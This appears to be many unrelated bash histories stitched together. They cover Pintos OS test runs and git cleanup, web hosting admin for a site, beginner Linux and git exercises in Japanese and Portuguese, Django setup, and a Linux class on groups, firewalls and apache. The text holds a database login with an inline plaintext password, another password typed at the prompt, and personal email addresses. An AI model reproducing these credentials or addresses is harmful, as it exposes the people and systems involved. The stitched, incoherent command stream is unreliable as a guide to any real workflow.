--qemu --filesys-size=2 -p tests/userprog/args-single -a args-single -- -q -f run 'args-single ss' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-single -a args-single -- -q -f run 'args-single ss' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-single -a args-single -- -q -f run 'args-single ss' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-single -a args-single -- -q -f run 'args-single ss' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-single -a args-single -- -q -f run 'args-single ss' +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-single -a args-single -- -q -f run 'args-single arg-one' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-single -a args-single -- -q -f run 'args-single arg-one' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-single -a args-single -- -q -f run 'args-single arg-one' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-single -a args-single -- -q -f run 'args-single arg-one' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-single -a args-single -- -q -f run '/bin/ls -l foo bar' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-single -a args-single -- -q -f run '/bin/ls -l foo bar' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-single -a args-single -- -q -f run '/bin/ls -l foo bar' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-single -a args-single -- -q -f run '/bin/ls -l foo bar' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-single -a args-single -- -q -f run '/bin/ls -l foo bar' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-single -a args-single -- -q -f run '/bin/ls -l foo bar' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-single -a args-single -- -q -f run '/bin/ls -l foo bar' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-single -a args-single -- -q -f run '/bin/ls -l foo bar' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-single -a args-single -- -q -f run '/bin/ls -l foo bar' +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-single -a args-single -- -q -f run 'args-single arg-one' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-single -a args-single -- -q -f run '/bin/ls -l foo bar' +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-single -a args-single -- -q -f run 'args-single arg-one' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-single -a args-single -- -q -f run 'args-single arg-one' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-single -a args-single -- -q -f run 'args-single arg-one' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-single -a args-single -- -q -f run 'args-single arg-one' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-single -a args-single -- -q -f run 'args-single arg-one' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-single -a args-single -- -q -f run 'args-single arg-one' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-single -a args-single -- -q -f run 'args-single arg-one' +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-multiple -a args-multiple -- -q -f run 'args-multiple aslkj sd wefwd' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-multiple -a args-multiple -- -q -f run 'args-multiple aslkj sd wefwd' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-multiple -a args-multiple -- -q -f run 'args-multiple aslkj sd wefwd' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-multiple -a args-multiple -- -q -f run 'args-multiple aslkj sd wefwd' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-multiple -a args-multiple -- -q -f run 'args-multiple aslkj sd wefwd' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-multiple -a args-multiple -- -q -f run 'args-multiple aslkj sd wefwd' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-multiple -a args-multiple -- -q -f run 'args-multiple aslkj sd wefwd' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-multiple -a args-multiple -- -q -f run 'args-multiple aslkj sd wefwd' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-multiple -a args-multiple -- -q -f run 'args-multiple aslkj sd wefwd' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-multiple -a args-multiple -- -q -f run 'args-multiple aslkj sd wefwd' +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-single -a args-single -- -q -f run 'args-single arg-one' +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-multiple -a args-multiple -- -q -f run 'args-multiple aslkj sd' +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-multiple -a args-multiple -- -q -f run 'args-multiple aslkj sds' +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-multiple -a args-multiple -- -q -f run 'args-multiple aslkj sds' +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-multiple -a args-multiple -- -q -f run 'args-multiple aslkj sdsss' +git +git status +vim .gitignore +git status +vim .gitignore +git checkout +git status +git checkout .bash_history +git checkout .viminfo +git status +git add all +git add --all +git status +git checkout /pintos/src/example/* +git checkout pintos/src/example/* +git checkout pintos/src/example* +git status +git checkout pintos/src/examples* +git status +git checkout pintos/src/examples/* +git status +git checkout pintos/src/examples/*.o +git status +git checkout pintos/src/examples/ +git status +git checkout pintos/filesys.dsk +git rm pintos/filesys.dskgit reset +git reset HEAD pintos/src/examples/* +git status +git checkout pintos/src/examples/* +git checkout pintos/src/examples +git status +git reset HEAD .sgrep.c.swp +rm .sgrep.c +ls +git status +git reset HEAD .vim/.netrwhist +git reset HEAD .ssh/known_hosts +git checkout .ssh/known_hosts +git reset HEAD pintos/filesys.dsk +git status +git reset HEAD pintos/filesys.disk +git status +git checkout-index -a -f --prefix=/pintos/src/examples/ +git checkout-index -a -f --prefix=pintos/src/examples/ +git status +vi .gitignore +git status +vi .gitignore +git status +vi .gitignore +git status +vim .gitignore +git status +git checkout +git checkout .viminfo +git status +git add --all +git status +git rm HEAD pintos/src/examples/.gitignore +git reset HEAD pintos/src/examples/.gitignore +git status +rm pintos/src/examples/.gitignore +git status +git commit -m 'argument passing successful' +make +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-single -a args-single -- -q -f run 'args-single arg-one' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-single -a args-single -- -q -f run 'args-single arg-one' +makemake +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-single -a args-single -- -q -f run 'args-single arg-one' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-single -a args-single -- -q -f run 'args-single arg-one' +make +git push +git push origin HEAD +git push origin master +git branch +git push origin/master +git origin +git remote +git status +git remote +git push origin sumin +git commit +git commit -am "m" +git push origin sumin +git push origin +git push origin/master +git branch +git branch * +git push +git branch +git checkout master +git status +ls +vi process.c +git status +git +git status +vim .gitignore +git status +vim .gitignore +git status +git add .gitignore +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-single -a args-single -- -q -f run 'args-single arg-one' +git commit +git commit +git status +git add pintos/src/userprog/ +git status +git add .viminfo +git status +ls +git status +git remote +git branch +git checkout sumin +git checkout -f sumin +ls +vi pintos/src/userprog/ +vi process.c +git status +git checkout -f master +vi process.c +git +git remote +git fetch origin master +git status +git checkout pintos/src/examples/* +vi .gitignore +git status +vi .gitignore +git status +git add --all +git commit -am "sync sumin to master" +git push origin master +git status +git add --all +git commit -m "ho" +git push origin master +vi .gitignor +vi .gitignore +git checkout .viminfo +git commit -am "remove vim info" +git status +rm .viminfo +git checkout .viminfo +git status +ls -al +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-single -a args-single -- -q -f run 'args-single arg-one' +make +mak +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-single -a args-single -- -q -f run 'args-single arg-one' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-single -a args-single -- -q -f run 'args-single arg-one' +git stash . +git checkout . +ls +make +make grade +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-none -a args-none -- -q -f run args-none +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-none -a args-none -- -q -f run args-none +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-none -a args-none -- -q -f run args-none +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-none -a args-none -- -q -f run args-none +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-none -a args-none -- -q -f run args-none +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-none -a args-none -- -q -f run args-none +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-none -a args-none -- -q -f run args-none +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-none -a args-none -- -q -f run args-none +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-none -a args-none -- -q -f run args-none +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-none -a args-none -- -q -f run args-none +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-none -a args-none -- -q -f run args-none +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-none -a args-none -- -q -f run args-none +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-none -a args-none -- -q -f run args-none +ls -lh +mkdidr public_html +mkdir public_html +ls +ls -lh +vi eblokir.conf +ls +ls +vi info.php +ls -lh +chmod 644 info.php +ls +ll +chmod 755 public_html +ls +cp public_html/application/config/database.php . +ls -lh +mkdir eblokir.com +mv public_html/* eblokir.com/ +mv eblokir.com public_html/ +ls -lh +ls +ll +chmod 755 eblokir.com/ +ll +ls -al +ls -lh +ssh localhost +ls +vi authorized_keys +ls -lh +chmod 600 authorized_keys +ll +ssh eblokir@eblokir.com +ls -lh +ls +ls +ls +ls +vi models/ +ls +vi stat_model.php +mysql -ueblokir_user -p1q2w3e4r eblokir_db +vi public_html/eblokir.com/application/modules/depan_baru/models/stat_model.php +vi index.php +ifco +ls +ls +mkdir tigapilarmandiri.com +pwd +ls +ssh localhost +ls +ls -lh +vi authorized_keys +ls +ls +ls -lh +mkdir pengaduan.bpkb.net +ls -lh +ls +ll +ls -al +vi .htaccess +ls +ls +ls +ls +ls +ls +ls +vi baru_verifikasi.php +ls +ls +vi master_controller.php +ls +ls +ls -lh +ls +ll +ls +ls +ls -lh +tar czvf eblokir.com.tar.gz eblokir.com +ll +iconv +ls +ls +vi index.php +ls +l +ls -lh +ls +ls +ls +vi polda_m.php +ls +ls +vi index.php +ls +ls +ls +ls +ls +ls +ls +ll +vi surat +vi surat.php +ls +vi index.php +ls +crontab -l +ls +ls +ls +ls +ls +ls +ls +ls +vi ws.php +ls +ll +ll +mkdir ws.eblokir.com +ls -lh +ls +c de +ls +ls +ls +ls +ls +vi baru_verifikasi.php +ls +vi index.php +ls +ls +ls +ls +ls -lh +vi polisi_verifikasi.php +sudo locale-gen ja_JP.UTF-8 +echo export LANG=ja_JP.UTF-8 >> ~/.profile +source ~/.profile +date +sudo apt-get update +sudo apt-get install bsdgames +tetris-bsd +vagrant halt +vagrant up +vagrant ssh +sudo apt-get install ninvaders +ninvaders +sudo lshw -short +man df +df +pwd +ls -a +pwd +ls +pwd +pwd +ls +pwd +mkdir workspace +mkdir tmp +ls +mkdir a +mkdir b +ls +rm a +rm -r a +ls +cp -r tmp workspace +ls +ls +mv b c +ls +mv tmp/c workspace/tmp +ls workspace/tmp +find +find . -name b +man man +~/vagrant/ubuntu64_16 +vagrant reload +vagrant ssh +mkdir workspace/tmp +mkdir workspace +ls +mkdir workspace/tmp +mkdir workspace/tmp +ls +ls +mkdir a +mkdir a/a +mkdir a/b +mkdir a/c +cp -r a/c +cp -r a b +find +ls tmp +ls > tmp/ls-output.txt +ls tmp +cat tmp/ls-output.txt +ls /bin > tmp/ls-output-bin.txt +less tmp/ls-output-bin.txt +ls /bin | less +ls /bin | grep ss +ls /bin | grep -v ss > ~/tmp/not-ss-command.txt +less ~/tmp/not-ss-command.txt +vim .profile +mkdir ~/workspace/vim-study +vim test.txt +ls +vimtutor +mkdir workspace/training06 +mk-template-dir.sh +touch mk-template-dir.sh +chmod a+x mk-template-dir.sh +./mk-template-dir.sh +curl +ping www.google.co.jp +ping www.u-tokyo.ac.jp +ping stanford.edu +ping www.ox.ac.uk +sudo tcpdump src www.nicovideo.jp -X +touch quiz.sh +chmod a+x quiz.sh +mkdir workspace/my-first-shell +mkdir workspace/quiz +touch quiz.sh +chmod a+x quiz.sh +./quiz.sh +touch mk-template-dir.sh +mkdir workspace/my-first-shell +touch my-first.sh +chmod a+x my-first.sh +./my-first.sh +date +date +while :; do (echo "Thank you for your access!") | nc -l 8000 ; done +telnet 8000 +tmux +tmux a +tmux +nc nnn.ed.jp 80 +GET / HTTP/1.1 +nc nnn.ed.jp 80 +GET / HTTP/1.1 +nc nnn.ed.jp 80 +less /etc/hosts +mkdir ~/workspace/httpd +tmux +nc 8000 +nc -l -p 8000 +curlst:8000/index.html +sudo apt install ruby +ruby -run -e httpd . -p 8000 +ruby -run -e httpd . -p 8000 +mkdir ~/workspace/itunes-topsong-rss/ +touch itunes-topsong.sh +chmod a+x itunes-topsong.sh +./itunes-topsong.sh +crontab -e +mkdir ~/workspace/bot +touch niconico-ranking.sh +chmod a+x niconico-ranking.sh +./niconico-ranking.sh +ls ~/workspace +./niconico-ranking.sh +ls ~/workspace/niconico-ranking-rss +./niconico-ranking.sh +ls ~/workspace/niconico-ranking-rss +crontab -e +sudo apt-get update +sudo apt-get install git +ssh-keygen +ls ~/.ssh +cat ~/.ssh/id_rsa.pub +git clone git@github.com:kenichinishimura/assessment.git +ls +git pull origin gh-pages +cat assessment.html +git config --global user.name "kenichinishimura" +git config --global user.email kenichi1125@gmail.com +git config --global core.editor "vim" +git config -l +mkdir git-study +git init +echo "# Gitの勉強" > README.md +cat README.md +git add README.md +git status +git commit -m "はじめてのコミット" +git log +git remote add origin git@github.com:kenichinishimura/git-study.git +git push -u origin master +git tag 1.0 +git push --tags origin master +vim README.md +git status +git add README.md +git commit -m "内容を追加" +git push origin master +cat README.md +git branch +git branch gh-pages +git branch +git checkout gh-pages +git branch +touch index.html +git add . +git commit -m "GitHub Pages用のWebページを作成" +ls +git checkout master +ls +git checkout gh-pages +git push origin gh-pages +git checkout master +git merge gh-pages +ls +git push origin master +git checkout master +git add . +git commit -m "一行追加" +git checkout gh-pages +git merge master +git push origin gh-pages +sudo top +exit +exit +exit +apt-get update +apt-get install +vi /var/html/index.nginx-debian.html +apt-get update +apt-get install +vi /var/www/html.nginx-debian.html +apt-get update +git --version +git init +git clone +touch file(1...6) +touch file{1..6} +ls +git status +git add file1 file2 +git commit -m"nag1" +git push -u origin master +git status +git commit -m "nag1" +git push -u origin master +git config user.name "nagaraju27" +git config user.email"r.nag57@gmail.com" +git push -u origin master +git branch +git branch n1 +git branch n2 +git push -u origin n1 +git branch status +git status +git checkout n1 +git push -u origin n1 +git add n1 +git add file1 file2 +git commit -m "n1" +git push -u origin n1 +clear +su +ifconfig +putty +putty lo.hn +clear +[ +clear +exit +ls +la -la +vi teste +dir +ls -la +cat teste +vi teste +cat teste +pico teste +exit +ifconfig +echo $PATH +mkdir bin +vi primeiro +chmod +x primeiro +ls -l +ls -la +primeiro +vi primeiro +primeiro +vi primeiro +primeiro +vi primeiro +primeiro +vi primeiro +primeiro +vi primeiro +primeiro +vi primeiro +df -h +vi primeiro +primeiro +vi primeiro +primeiro +primeiro +vi primeiro +fg +ls +vi primeiro +primeiro +exit +vi primeiro +cat -n primeiro +vi primeiro +primeiro +n +vi primeiro +primeiro +man cat +man cut +exit +primeiro +fg +primeiro +vi primeiro +vi primeiro +ls +ls -la +lala=xxx +echo lala +echo $lala +VARIAVEL="estou sem ideias" +echo $variavel +VARIAVEL= "estou sem ideias" +VARIAVEL="estou sem ideias" +echo $VARIAVEL +VARIAVEL=estou sem ideias +VARIAVEL="estou sem ideias" +echo $VARIAVEL +ECHO $VARIAVEL $VARIAVEL +echo $VARIAVEL $VARIAVEL +ECHO $VARIAVEL$VARIAVEL +echo $VARIAVEL$VARIAVEL +HOJE='date' + +HOJE=$(date) +echo "Hoje e: $HOJE" +DATE +date +JONATA=lindo +echo $JONATA +JONATA=jonata Lindo +JONATA=$jonata$Lindo +echo $JONATA +PA="jonata lindo" +echo $JONATA +echo $PA +unset HOJE +echo $HOJE +unset HOJE +echo $HOJE +cat-n primeiro +cat -n primeiro +act +cat +cat primeiro +cat -n primeiro +$PAth +$PAFH +$PATH +cleanr +cleaer +clear +man cat +wc primeiro +sort primeiro +vi primeiro +ser primeiro +seq primeiro +grep primeiro +grep -i primeiro +seq -n primeiro +seq -n +clear +vi primeiro +ls +ls -la +ls ls +ls- +ls -la +ls --l +ls -l +ls +ls +ls -la +vi primeiro +ls +ls +primeiro +exit +primeiro +vi primeiro +vim primeiro +vi primeiro +vls +lsls +ls +vi teste +ls +ls +vi primeiro +ls +nano lohn +vi lohn +cat lohn +./lohn +chmod o+x lohn +./lohn +ls -l +chmod +x lohn +./lohn +vi lohn +./lohn +vi lohn +./lohn +ls -l +touch chiquinha +./lohn chiquinha +ls +vi chiquinha +rm -r chiquinha +ls +nano lohn +ls -l +vi lohn +vi teste +ls +cat teste +./tes +./teste +chmod +777 teste +chmod 777 teste +ls +ls -l +./teste +teste +vi teste +cat teste +./teste +vi teste +cat teste +./teste +clar +clear +vi teste2 +chmod +x teste2 +ls -l +;/teste2 +./teste2 +vi teste2 +exit +sudo apt-get update +sudo apt-get dist-update +sudo apt-get dist-upgrade +sudo apt-get install python-pip +sudo pip install --upgrade pip +sudo pip instal diango +sudo pip install diango +sudo pip install diango==1.10 +sudo pip install Django +sudo reboot +ls +python manage.py makemigrations +pip install pillow +pip install Pillow +sudo pip install Pillow +python manage.py makemigrations +python manage.py migrate +python manage.py runserver + +python manage.py migrate +python manage.py runserver +sudo vim /etc/hosts +sudo vim setting +sudo vim settings.py +ls +vim settings.py +python manage.py runserver +vim settings.py +ls +vim settings.py +sudo vim setttings.py +sudo vim setttings.py +ls +sudo vim setttings.py +ls +sudo vim setttings.pyc +ls +ls +ls +python manage.py makemigrations +python manage.py migrate +python manage.py runserver +sudo pip install -U channels +git clone git@github.com:django/channels.git +ls +git clone git@github.com:django/channels.git +git clone gits.git +git clones.git + + +sudo pip install -e + +sudo pip install -e . + +pip install -e . +ls +ls +ls +vim settings.py +ls +ls +vim settings.py +ls +python manage.py runserver +python manage.py runserver +ls +ls +vim consumers.py +ls +ls +ls +vim settings.py +vim routing.py +python manage.py makemigrations +python manage.py migrate +python manage.py runserver +vim settings.py +ls +ls +vim routing.py +python manage.py runserver +sudo pip install asgi_redis +sudo pip install feedparser +vim settings.py +ls +ls +ls +vim settings.py +ls +vim game +ls +ls +redis-server /usr/local/etc/redis.conf +sudo apt install redis-server +redis-server /usr/local/etc/redis.conf +LS +ls +vim comsumers.py +ls +vim comsumers.py +ls +ls +ls +ls +python manage.py makemigrations + +python manage.py makemigrations +python manage.py migrate +python manage.py runserver +python manage.py runserver +ls +ls +vim settings.py +ls +ls +ls +vim setiings.py +vim settings.py +ls +python manage.py runserver +ls +python manage.py makemigrations +python manage.py migrate +python manage.py migrate game +python manage.py makemigrations game +python manage.py migrate game +python manage.py runserver +python manage.py migrate game +python manage.py runserver +ls +ls +vim settings.py +python manage.py migrate game +python manage.py makemigations +python manage.py makemigrations +python manage.py migrate game +python manage.py migrate +python manage.py makemigrations game +python manage.py makemigrations +python manage.py makemigrations game +python manage.py +python manage.py migrate +python manage.py migrate game +python manage.py runserver +python -c "import django; print(django.get_version())" +python manage.py migrate game +python -c "import django; print(django.get_version())" +python manage.py runserver +python manage.py makemigrations game +python manage.py makemigrations +python manage.py migrate game +python manage.py runserver +ls +python manage.py makemigrations +python manage.py migrate +python manage.py migrate game +python manage.py makemigrations +python manage.py makemigrations game +python manage.py migrate +python manage.py migrate game +python manage.py makemigrations game +python manage.py migrate +python manage.py makemigrations game +ls +ls +ls +ls +python manage.py makemigrations game +python manage.py makemigrations +python manage.py migrate game +python manage.py migrate +python manage.py makemigrations game +python manage.py runserver +python manage.py makemigrations game +python manage.py migrate +python manage.py runserver +ls +ls +ls +ls +ld + +vim game2.html +python manage.py runserver +ls +vim settings.py +python manage.py runserver +python manage.py runserver +sudo pip install -U channels +sudo pip install -U asgi_redis +ls +ls +manage.py runserver +python manage.py runserver +ls +vim ppx +ls +vim settings.py +ls +python manage.py runserver +sudo systemctl set-default multi-user.target +shutdown -r now +sudo passwd root +su root +ip addr +sudo nmtui +shutdown -h now +ls -la +l +ls -a +ls -la +touch /Videos +touch Videos/ +ls -la +ls -la +ls -la +c +ls -la +ls -la +touch spacejam +touch empty1 empty2 empty3 +ls -la +pwd +pwd +ls +pwd +ls -la +rm --help +mkdir emptydirectory notemptydirectory +mkdir emptydirectory +sudo mkdir empty notempty +ls -l +touch file1 file2 +sudo touch file1 file2 +sudo mkdir alsonotempty +ls -l +ls -la +ls -la +d +vim +apt-get install -y vim +sudo apt-get install -y vim +vium +vim +vim newfile.txt +ls -l +cat newfile.txt +ls -l +newfile.txt +vim newfile.txt +cat newfile.txt +vim newfile.txt +nano +nano testnotes.txt +cat testnotes.txt +ls -l +nm testnotes.txt +rm testnotes.txt +ls -l +nano UserList.txt +cat UserList.txt +cat UserList.txt more +ls -la +cat UserList.txt +cat UserList.txt less +nano UserList.txt +ls -la +cat UserList.txt +ip -a +ip addr show +ip route list +scp localmachine/UserList.txt student01@localhost_10.0.2.5:/student01/home +scp localmachine/UserList.txt student01@localhost_10.0.2.1:/student01/home +scp localmachine/UserList.txt student01_10.0.2.1:/student01/home +pwd +apt-get install -y openssh-server +sudo apt-get install -y openssh-server +pwd +ip addr show +pwd +ls -l +su +exit +pwd +su - root +logout +ls -l +nano UserList.txt +ls -l +newfile.txt +vi newfile.txt +ls -l +cp newfile.txt employees.txt +ls -l +vi employees.txt +useradd +which useradd +useradd josh +exit +ls -l +exit +ls -l +nano employees.txt +exit +addr +show addr +ip addr +useradd ttoolman +exit +ls -l +exit +ls -l +pwd +xeyes +bg xeyes +xeyes& +top +jobs +pidof xeyes +pkill 4318 +\kill 4318 +xeyes +xeyes& +kill 4318 +pidof xeyes +kill 4418 +reboot +xeyes& +apt install -y xpenguins +sudo apt install -y xpenguins +xpenguins& +kill 5141 +xpenguins +kill 5141 +pidof xeyes +kill 4473 +pidof xpenguins +xpenguins +sudo cat /etc | group +sudo cat /etc/group +sudo groupadd +sudo groupadd Finance +sudo cat /etc/group +sudo groupadd Marketing +sudo groupadd Sales +sudo groupadd Engineering +sudo groupadd Human Resources +sudo tail -10 cat /etc/group +sudo tail cat /etc/group +sudo tail -20 cat /etc/group +sudo tail 20 cat /etc/group +sudo tail cat /etc/group +sudo tail -n 20 cat /etc/group +sudo tail -n 20 /etc/group +chgrp bwhite Human Resources +sudp groupmod --help +sudo groupmod --help +sudo tail /etc/group +sudo groupadd Human Resources +sudo groupadd HR +sudo groupadd external +sudo groupadd -n "Human Resources" HR +sudo groupmod -n "Human Resources" HR +sudo groupmod -n Contractors external +sudo groupmod -n 'Human Resources" HR +q +q +' +sudo groupmod -n humanresources hr +tail /etc/group +sudo groupmod -n humanresources HR +groups +groups --help +chmod --help +sudo groups student01 +sudo useradd -G humanresources bwhite + +tail /etc/groups +tail /etc/group +sudo groups bwhite +tail /etc/group +sudo groupadd engineering +sudo useradd -Ga engineering ttoolman +sudo useradd -G -a engineering ttoolman +sudo useradd -a -G engineering ttoolman +sudo usermod -Ga engineering ttoolman +sudo usermod -a -G engineering ttoolman +sudo usermod -a -G engineering sford, jwallace +sudo usermod -a -G engineering sford +sudo usermod -a -G engineering jwallace +sudo usermod -a -G Finance mschwartz +sudo usermod -a -G Finance sholmes +sudo usermod -a -G Sales sbanner +sudo usermod -a -G Sales tallen +sudo usermod -a -G humanresources croberts +sudo usermod -a -G engineering,Finance,Sales +sudo usermod -a -G +sudo usermod -a -G engineering,Sales,Marketing cwalker +deluser bwhite contractors +sudo deluser bwhite contractors +sudo deluser bwhite external +group +tail /etc/group +sudo deluser bwhite humanresources +tail /etc/group +sudo usermod -a -G humanresources bwhite +id bwhite +exit +date +date +%a +date +%h +date +%t +date +%H +date +%A +timedatectl +mkdir -? +mkdir --help +dpkg --help +man dpkg +nl +jobs +pkill nl +nl -? +nl --help +where is bash +ls -l +ls -l | less +lvm +lvm2 +exit +sudo apt update +sudo apt upgrade +apt get moo +apt moo +vi /etc/resolv.conf +dig nvcc.edu +sudo systemctl status ufw +systemctl httpd +Pa22w0rd +systemctl start httpd +apt install -y lynx +sudo apt install -y lynx +locate lync +locate lynx +which lynx +systemctl status httpd +systemctl status httpd.service +systemctl statys apache +systemctl status apache +systemctl status apache.service +systemctl start apache2 +systemctl status apache +systemctl status httpd +which apache +apt install -y apache2 +sudo apt install -y apache2 +systemctl start apache +systemctl status apache +systemctl status apache2 +lynx +lynx www.google.com +it +y +lynx +lynx +firewall-cmd --add-service=http +ufw-cmd --add-service=http +ufw --add-service=http +ufw allow http +sudo ufw allow http +ip addr +ufw status +sudo ufw status +sudo systemctl start ufw +sudo ufw status +sudo systemctl start ufw +sudo ufw status +systemctl reload ufw +sudo ufw status +systemctl enable ufw +systemctl reload ufw +sudo ufw status +reboot +systemctl status ufw +systemctl status apache +systemctl status apache2 +sudo ufw status n +sudo ufw status numbered +systemctl status apache2 +sar --help +vmstat +free +ping -c +netstat -l +nmcli device status +cat /etc/hosts +vi /etc/localhost +cat /etc/hosts +vi /etc/host +cat /etc/hosts +vi /etc/hosts +sudo vi /etc/hosts +chattr --help +chattr -? +chattr man +chattr --help +chattr man +man chattr +man tar +man bzip2 +man tar +lsof -? +man lsof +xeyes +pgrep apache +systemctl status apache2 +gettarget +systemctl isolate graphical.target +systemctl isolate multiuser.target +Pa22w0rd +systemctl isolate multi-user.target +ping +reboot +systemctl isolate graphical.target +systemctl isolate multiuser.target +systemctl isolate multi-user.target +netstat +sudo install net-tools +sudo apt install net-tools +systemctl isolate graphical.target +xeyes +xeyes& +nohup exeyes& +nohup xeyes& +ps +ps aux +ps aux | grep xeyes +ps -ef +ps -ef | grep xeyes +pkill xeyes +nohup xeyes& +nohup xeyes +nohup xeyes& +gedit +nice -2 xeyes +nice -2 xeyes& +ps +top +ls apache +systemctl status apache2 +systemctl start apache2 +systemctl status apache2 +systemctl stop apache2 +echo who +who +nano login.sh +login.sh +sudo login.sh +nano login.sh +./login.sh +chown login.sh +chown .login.sh +chown /home/student01/login.sh +chmod 770 login.sh +./login.sh +nano login.sh +./login.sh +nano login.sh +etc /bin +ls +ls -a +ls *sh +ksh +sudo yum install -y ksh +sudo apt install -y ksh +ksh +ps -p $$ +ksh +systemctl set graphical.target +systemctl isolate graphical.target +./login.sh +touch file7 +ls -la +./login.sh +nano login.sh +./login.sh +ls -l +nano userinfo.sh +./userinfo.sh +chmod 770 userinfo.sh +./userinfo.sh +nano userinfo.sh +./userinfo.sh +nano login.sh +./login.sh +nano userinfo.sh +./login.sh +./userinfo.sh +nano userinfo.sh +./userinfo.sh & +exit +nano userinfo.sh +./userinfo.sh +nano userinfo.sh +./userinfo.sh +nano userinfo.sh +./userinfo.sh +ls env +lsenv +list variables +printenv +env +printenv +env +printenv +env +nano userinfo.sh +./userinfo.sh +nano userinfo.sh +$UID +nano userinfo.sh +./userinfo.sh +nano userinfo.sh +./userinfo.sh +nano userinfo.sh +./userinfo.sh +nano userinfo.sh +./userinfo.sh +nano userinfo.sh +bc +nano userinfo.sh +nano while.sh +./while.sh +chmod 770 while.sh +./while.sh +nano while.sh +./while.sh +nano while.sh +./while.sh +nano while.sh +./while.sh +ls -l +nano while.sh +./while.sh +nano loop.sh +touch file +. +./login.sh +./loop.sh +chmod 770 loop.sh +./loop.sh +nano loop.sh +./loop.sh +ls +nano while.sh +.\while.sh +nano while.sh +.\while.sh +chmod 770 while.sh +. +.\while.sh +./while.sh +nano while.sh +./while.sh +nano while.sh +./while.sh +nano while.sh +./while.sh +nano while.sh +./while.sh +nano while.sh +./while.sh +nano while.sh +./while.sh 6 +nano while.sh +./while.sh 6 +echo 2, 4, 3, 1, 2, 1, 2, 5 +echo minute, hour, day of month, month, day of week +nano crondateformat.txt +cat crondateformat.txt +ls +ldd .bash +ldd .sh +sudo apt install -y ldd +apt provides ldd +apt search ldd +ldd +which ldd +ldd +ldd --help +ldd -v +ldd -v /bin/bash +ldd -v ping +ldd -v /bin/bash +git +apt install -y git +sudo apt install -y git +git --help +rm git +which git +ls +rm file.7 +rm file7 +ls +systemctl status apache2 +systemctl start apache2 +systemctl status apache2 +ps aux +ps aux | py +ps aux | apache +ps aux | httpd +ps aux | apach* +ps aux | apache* +ps aux | apache2 +ps aux | grep apache2 +systemctl status apache2 +ps aux | grep apache2 +kill -9 9637 +sudo kill -9 9637 +ps +ps -ef | grep apache2 +sudo kill -9 9643 +sudo pkill apache2 +systemctl status apache2 +shutdown -h now +time +:! +lsof +top +pgrep 